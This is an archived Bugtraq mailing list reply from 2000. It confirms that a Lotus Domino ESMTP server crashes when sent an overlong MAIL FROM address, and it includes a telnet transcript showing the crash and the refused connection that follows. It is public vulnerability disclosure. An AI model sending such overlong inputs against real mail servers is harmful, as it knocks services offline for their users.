Bugtraq mailing list archives

Re: Lotus ESMTP Service (Lotus Domino Release 5.0.1 (Intl))

From: chris () REVOLT COM (chris neill)
Date: Fri, 19 May 2000 17:57:34 -0500


On Thu, May 18, 2000 at 09:11:33PM +0200, Michal Zalewski wrote:

Not much to say. While performing basic input validation checks in Lotus
Domino ESMTP service (see subject) running on the top of Windows NT system

[snip.. ]

I'm running r5.0.2b on a Sun E420R w/ patched up Solaris 7 and got a
confirmed kill on one of our notes servers:
telnet 10.92 smtp
Trying 10.0.0.92...
Connected to 10.92.
Escape character is '^]'.
220 XXX ESMTP Service (Lotus Domino Release 5.0.2b) ready at Fri, 19 May 2000 15:35:25 -0700
HELO d00d
250 XXX Hello d00d ([10.0.0.91]), pleased to meet you
MAIL FROM: <hi@[4k of junk]>
Connection closed by foreign host.
# telnet 10.92 smtp
Trying 10.0.0.92...
telnet: Unable to connect to remote host: Connection refused

--
$Id: .sig,v 1.45 2000/05/10 02:54:51 neill Exp $
"like a green red blue reindeer, laying down dead with a fawn. copulating,
having sex with a baboon with buffalo wings." kool keith, aka dr. octagon

Current thread:

Eudora Pro & Outlook Overflow - too long filenames again Ultor (May 15)
- Fwd: [nohack] Yet another way to disguise files. Josh Rollyson (May 16)
  - Re: Fwd: [nohack] Yet another way to disguise files. Ron DuFresne (May 16)
    - Lotus ESMTP Service (Lotus Domino Release 5.0.1 (Intl)) Michal Zalewski (May 18)
    - Re: Lotus ESMTP Service (Lotus Domino Release 5.0.1 (Intl)) chris neill (May 19)
    - Jolt2 crashes tcpdump Earl T. Carter (May 30)
    - Re: Lotus ESMTP Service (Lotus Domino Release 5.0.1 (Intl)) Cory Visi (May 31)
    - IBM HTTP SERVER / APACHE Marek Roy (May 31)
    - Re: Fwd: [nohack] Yet another way to disguise files. Peter W (May 18)
- Re: Eudora Pro & Outlook Overflow - too long filenames again Henrik .H (May 16)
- <Possible follow-ups>
- Re: Eudora Pro & Outlook Overflow - too long filenames again Microsoft Security Response Center (May 16)